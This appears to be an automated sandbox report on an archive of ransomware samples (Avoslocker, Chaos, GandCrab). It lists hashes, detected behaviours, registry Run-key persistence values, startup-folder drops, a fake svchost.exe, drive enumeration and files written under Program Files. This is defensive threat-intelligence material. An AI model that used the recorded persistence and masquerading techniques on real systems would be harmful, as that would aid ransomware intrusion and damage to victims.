Malware Analysis Report

2024-10-16 03:26

Sample ID 240921-zy79natgkl
Target RNSM00476.7z
SHA256 03a15123b54b8e5252af565dbc10e7c1d732ab8a92b905f6811e621680d7ff2c
Tags
avoslocker chaos gandcrab backdoor discovery execution persistence pyinstaller ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

03a15123b54b8e5252af565dbc10e7c1d732ab8a92b905f6811e621680d7ff2c

Threat Level: Known bad

The file RNSM00476.7z was found to be: Known bad.

Malicious Activity Summary


Avoslocker Ransomware

Chaos Ransomware

Gandcrab

Chaos

GandCrab payload

Renames multiple (176) files with added filename extension

Renames multiple (74) files with added filename extension

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

UPX packed file

Drops startup file

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Enumerates connected drives

Drops desktop.ini file(s)

Uses Tor communications

Sets desktop wallpaper using registry

Drops file in Program Files directory

Detects Pyinstaller

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Command and Scripting Interpreter: PowerShell

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Checks processor information in registry

Checks SCSI registry key(s)

Modifies registry key

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-21 21:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-21 21:08

Reported

2024-09-21 21:13

Platform

win10v2004-20240802-en

Max time kernel

275s

Max time network

277s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00476.7z

Signatures

Avoslocker Ransomware

ransomware avoslocker

Chaos

ransomware chaos

Chaos Ransomware

GandCrab payload

Gandcrab

ransomware backdoor gandcrab

Renames multiple (176) files with added filename extension

ransomware

Renames multiple (74) files with added filename extension

ransomware

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\svchost.url C:\Windows\system32\taskmgr.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\read_it.txt C:\Windows\system32\taskmgr.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Cntrlphse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zbhnd.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
N/A N/A C:\Users\Admin\AppData\ChickiMiki Design.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cntrlphse = "\"C:\\Users\\Admin\\AppData\\Roaming\\Cntrlphse.exe\"" C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Windows Explorer.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\omsyi2ijtq = "C:\\Users\\Admin\\DEsktop\\00476\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe" C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\plbddsybgrx = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\bieiih.exe\"" C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Program Files\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created F:\$RECYCLE.BIN\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\H: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A

Uses Tor communications

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1550356177.png" C:\Windows\SysWOW64\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVIsvSubsystemController.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\XLSLICER.DLL C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\ImagePlaceholderWhite.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index.exe.exe.exe C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\System.ServiceModel.Resources.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteSmallTile.scale-150.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe804.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngdatatype.md C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-pl.xrm-ms.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_scale-200.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\GameBar_MedTile.scale-200.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1194130065-3471212556-1656947724-1000-MergedResources-0.pri C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1 C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\plugin2\vcruntime140.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarWideTile.scale-200.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-150.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_4_Loud.m4a C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCommon.Thumbnails.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\166.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\skypex-icon-white.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-150_contrast-black.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
